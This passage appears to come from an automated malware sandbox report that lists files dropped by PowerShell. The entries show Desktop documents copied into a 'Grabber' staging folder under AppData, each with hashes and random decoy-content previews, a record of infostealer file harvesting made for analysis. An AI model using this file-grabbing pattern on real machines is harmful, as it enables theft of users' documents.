XEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690071120548773
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                      MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                      SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                      SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                      SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69569301223482
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
                                                                                      MD5:CA404BEA65D84F58838AF73B2DC67E02
                                                                                      SHA1:56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
                                                                                      SHA-256:4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
                                                                                      SHA-512:10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\DUUDTUBZFW.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\EIVQSAOTAQ.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.692024230831571
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\GRXZDKKVDB.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\KLIZUSIQEN.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\QCOILOQIKC.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697125102277996
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                                                      MD5:207485EFCE70435971C31586A1E4CF97
                                                                                      SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                                                      SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                                                      SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
